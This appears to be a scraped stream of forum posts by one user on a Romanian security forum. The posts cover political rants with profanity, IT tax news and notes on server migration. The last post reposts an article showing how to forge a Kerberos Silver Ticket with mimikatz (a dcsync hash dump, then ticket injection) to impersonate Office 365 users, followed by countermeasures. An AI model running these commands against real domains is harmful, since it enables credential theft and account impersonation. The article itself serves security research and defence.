Nytro

Sunt de acord, ma astept la multe, dar deocamdata vreau sa fie anulata acea OUG. De asemenea mai vreau transparenta. Vreau sa stim si noi ce se intampla in tara, nu sa se dea OUG-uri noaptea, fara ca macar sa fie pe ordinea de zi. Poporul a ales acest Guvern pentru anumite promisiuni si acesta e Guvernul nostru. Sper sa inteleaga ca suntem cu ochii pe ei.

Nu avea cum sa nu desemneze premier de la PSD (sau ALDE) si nici cum sa evite PSD la guvernare. Cat despre "razboiul" de care vorbeste mancatorul de cacat, nu este cazul, nu Presedintele a adus oamenii in strada. Deci Muie Tariceanu. Edit: Legat de discutia cu Dragnea, e adevarat ce a spus el, Ordonanta "nu il scapa de proces". Procesul va continua insa el nu va fi gasit vinovat. Si uite asa a fraierit (nu mintit) milioane de oameni. E o tehnica de manipulare simpla: spui adevarul intr-o forma care lasa sa se inteleaga un anumit lucru insa de fapt e vorba de altceva. Info: Instigare la abuz in serviciu se incadreaza la abuz in serviciu. Prejudiciul este de vreo 120.000 RON ceea ce e mai putin de 200.000 RON. Iar procesul este in desfasurare, nu va fi o decizie retroactiva. Adica mustaciosul scapa de acest dosar.

Exista doua tipuri de modificari: 1. Modificare a Codului Penal - intra in vigoare in 10 zile 2. Modificare a Codului de Procedura Penala - Intra in vigoare la publicarea in Monitorul oficial Ordonanta pulii cuprinde atat modificari de la 1. cat si modificari de la 2. http://www.digi24.ro/opinii/ordonanta-de-marti-explicata-2-661815 Detaliat: https://blog.factual.ro/myth-busting-si-faq-dezbaterea-publica-despre-ordonante/

Pentru cei care nu inteleg: https://www.facebook.com/ioana.chitu.5/videos/10154591999362912/ Ceva amuzant: https://www.facebook.com/viceromania/videos/1462295087128108/?hc_ref=NEWSFEED

Cacat! Am uitat sa trec prin Tor PS: M-am uitat pe cateva filmari, se vad multe fete, dar NU recunosc pe nimeni din PCH (Peluza Catalin Hildan), desi din vedere ii stiu pe multi dintre ei.

Mi-a dat Soros mail si cica ne trimite banii in Bitcoin.

Vreau sa mentionez ca nu a fost "Galeria lui Dinamo". Asa cum s-a intamplat cu Ponta, doar cativa din galerie s-au implicat, ca si aici probabil, pentru bani. Insa la primul meci, aproape toata peluza il injura pe Ponta. Probabil nu au fost platiti prea bine, din moment ce nici in echipa (care e o afacere) nu se baga bani. Asadar au fost niste muritori de foame, dintre care unii (sau toti) fac parte din peluza.

A fost publicata in Monitorul Oficial. Muie PSD si Guvernul Pulii.

Cei din staff sunt fortati sa foloseasca 2FA. Puteti totusi sa ne furati cookie-urile. Asta nu inseamna ca veti avea acces la AdminCP. Avem 3FA

Acum va putati seta Two-Factor autehntication si folosind tema default (neagra).

Am facut update la IP Board: https://invisionpower.com/release-notes/ Ce e nou: Two factor authentication. Insa deocamdata se poate seta doar folosind template-ul Default.

Am patit si eu cand am ajuns la birou. Mi-am petrecut 2 minute sa instalez certificat de la Let's Encrypt, va recomand. E OK acum?

O sa verific.

Ba da, renewal va costa probabil 30 EURO, ca sa scoata parleala.

Start fuzzing on Adobe Reader, find a crash, reproduce it, try to exploit it, exploit it, bypass mitigations, write a POC, write a full exploit.

Nu e relevant ce server e. Xeon, 32 GB. Ideea e sa imi spuneti daca apar probleme.

Clear cache ceva, poate pastreaza vechiul certificat, nu stiu.

In sfarsit ceva nou.

Salut, Am migrat catre un server nou, ceea ce inseamna ca pot sa apara diferite probleme. Postati aici ce fel de probleme intalniti si le vom repara cat putem de repede. Thanks, // Nytro

http://m.zf.ro/eveniment/asa-cum-vede-dragnea-romania-nu-avem-nevoie-de-angajati-cu-salarii-mari-si-nici-de-industrii-de-elita-16065908

Deoarece platesc deja mai mult decat altii prin CAS si CASS. Cei din IT, avand salarii mari, au si contributii mari, dar beneficii pula. Mergi la spital, stai la coada cu cei care platesc 50 RON/luna si ai parte de aceleasi "beneficii" cand tu dai milioane bune. In plus, IT-ul reprezinta peste 6% din PIB. Sunt miliarde de dolari care ajung in tara. Se platesc taxe pe acesti bani si se cheltuiesc acesti bani. E o industrie care ajuta Romania si de aceea trebuie sustinuta. PS: Exista diferite alte beneficii si in alte domenii, gen agricultura, start-upri (nu neaparat IT) si mai stiu eu ce.

Deocamdata nu, asteptam sa vedem daca se ia aceasta masura sau nu. Muie PSD, intotdeauna!

Aproape jumătate dintre angajaţii din industria IT din România ar putea să nu mai beneficieze de scutirea la plata impozitului pe venit. O modificare adusă Codului Fiscal la finalul anului trecut şi publicată acum în Monitorul Oficial prevede că vor beneficia în continuare de această facilitate doar cei care produc software. Modificarea adoptată de guvern în decembrie se referă la definirea activității de producție de software, dar textul apărut în Monitorul Oficial lasă loc de interpetări. Reiese că cei care produc programe de software vor fi scutiți de taxa de 16%, dar nu specifică foarte clar ce se întâmplă cu persoanele care modifică aceste produse sau contribuie la îmbunătățirea lor. Sunt 30.000 de angajaţi din IT care se ocupă de mentenanţa unor aplicaţii sau modifică produse software. În industria IT din România activează 75.500 de angajaţi în 14.000 de companii. Industria IT din România a crescut în ultimii ani, reprezentând 3% din PIB în 2012, iar în 2016, 6% din PIB. Veniturile generate sunt de peste 3,6 miliarde de euro. Există două variante: guvernul modifică normele de aplicare astfel încât lucrurile să fie mult mai clare, ori Ministerul de Finanțe emite un nou ordin care să stabilească o nouă definiție mult mai clară a activității de producție de software. (Sursa: Digi24) Sursa: http://www.digi24.ro/stiri/economie/angajatii-it-fara-scutire-la-impozitul-pe-venit-651101

Impersonating Office 365 Users With Mimikatz January 15, 2017 | Michael Grafnetter Introduction Last month, Microsoft has introduced a new feature of Azure AD Connect called Single Sign On. It allows companies to configure SSO between AD and AAD without the need to deploy ADFS, which makes it an ideal solution for SMEs. Here is a high-level diagram of this functionality: As we can see from the diagram above, Azure AD exposes a publicly available endpoint that accepts Kerberos tickets and translates them into SAML and JWT tokens, which are understood and trusted by other cloud services like Office 365, Azure or Salesforce. And wherever you have Kerberos-based authentication, it can be attacked using Silver Tickets. In usual circumstances this attack can only be performed from the intranet. But what really caught my attention is the fact that with this new SSO feature, Silver Tickets could be used from the entire internet. Let’s give it a try then! The Nasty Stuff To test this technique, we need to retrieve some information from Active Directory first: NTLM password hash of the AZUREADSSOACC account, e.g. f9969e088b2c13d93833d0ce436c76dd. This value can be retrieved from AD using mimikatz: 1 mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit My own DSInternals PowerShell Module could do the same job: 1 2 Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso ` -Server lon-dc1.contoso.local Both of these commands need Domain Admins permissions. Name of the AD domain, e.g. contoso.local. AAD logon name of the user we want to impersonate, e.g. elrond@contoso.com. This is typically either his userPrincipalName or mail attribute from the on-prem AD. SID of the user we want to impersonate, e.g. S-1-5-21-2121516926-2695913149-3163778339-1234. Having this information we can now create and use the Silver Ticket on any Windows computer connected to the internet. It does not even matter whether it is joined to a domain or a workgroup: Create the Silver Ticket and inject it into Kerberos cache: 1 2 3 4 mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit Launch Mozilla Firefox. Go to about:config and set the network.negotiate-auth.trusted-uris preference to value “https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com”. Navigate to any web application that is integrated with our AAD domain. We will use Office 365, which is the most commonly used one. Once at the logon screen, fill in the user name, while leaving the password field empty. Then press TAB or ENTER. That’s it, we’re in! To log in as another user, run the command below and repeat steps 1-6. 1 klist purge It is also worth noting that the password of the AZUREADSSOACC account never changes, so the stolen hash/key will work forever. It could therefore be misused by highly privileged employees to retain access to the IT environment after leaving the company. Dealing with such situations is a much broader problem, which is aptly depicted by the following old Narnian saying: Countermeasures First of all, I have to point out that this technique would not be very practical in real-world situations due to these reasons: The SSO feature is in Preview and has to be explicitly enabled by an AD admin. Just a handful of companies probably use it at the time of writing this article and enterprises will quite surely stick to their proven ADFS deployments even after this feature reaches GA. The hash/key of the AZUREADSSOACC account can only be retrieved by Domain Admins from DCs by default. But if an attacker had such highly privileged access to an Active Directory domain, he/she would be able to do some way nastier stuff than just replicating a single hash. The password of the AZUREADSSOACC account is randomly generated during the deployment of Azure AD Connect. It would therefore be impossible to guess this password. As you can see, there is simply no need to panic. But just to be safe, I would recommend these generic security measures: Only delegate administrative access to trusted individuals and keep the number of members of the Domain Admins group (and other privileged groups) as low as possible. Protect backups of Domain Controllers, so no-one could extract sensitive information from them. Enable and enforce Azure MFA for users authenticating from external IP addresses. It is very straightforward and effective against many kinds of attacks. Consider implementing Azure AD conditional access. Deploy Microsoft Advanced Threat Analytics to detect malicious replication and other threats to your AD infrastructure. Force a password change on the AZUREADSSOACC account by re-deploying Azure AD Connect SSO after a highly privileged employee leaves the company. This should be done together with resetting the password of krbtgt and other sensitive accounts. I am also quite sure that the Azure AD team at Microsoft is fully aware of this potential threat and there is chance that they could implement some kind of heuristics to detect forged Kerberos tickets in the future. It would also be nice if they implemented automatic password changes for AZUREADSSOACC (or it is already there and I just missed it). Again, we are talking about a feature that has not even reached the GA stage yet, so it is too soon to judge. Conclusion Although the Silver Ticket attack has been here for some years, it is now probably the first time it can be used over the internet against a cloud service, which theoretically makes it even more potent. On the other hand, it would be quite hard to perform this technique in a real-world environment due to impracticalities discussed in the previous section, so there is no need to worry. The new SSO feature of Azure AD Connect can therefore be considered safe and I would recommend using it. Sursa: https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/